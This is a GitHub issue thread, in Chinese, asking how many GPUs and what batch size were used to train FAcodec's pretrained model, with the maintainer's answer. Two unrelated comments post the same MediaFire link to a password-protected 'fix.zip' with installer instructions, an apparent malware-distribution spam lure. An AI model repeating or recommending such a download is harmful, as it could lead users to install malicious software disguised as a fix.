### ISSUE TITLE
GPU数量

### ISSUE THREAD

**Issue by Ajyy** [Plachtaa/FAcodec#20]
你好，目前的config，batch size是4，但是论文里是8卡32的batch size，想问下released pre-train model是用了多少张卡进行训练？谢谢

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Plachtaa** [comment]
是8卡，batch size是16或者32，不太记得了

**Comment by Ajyy** [comment]
好的，谢谢

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
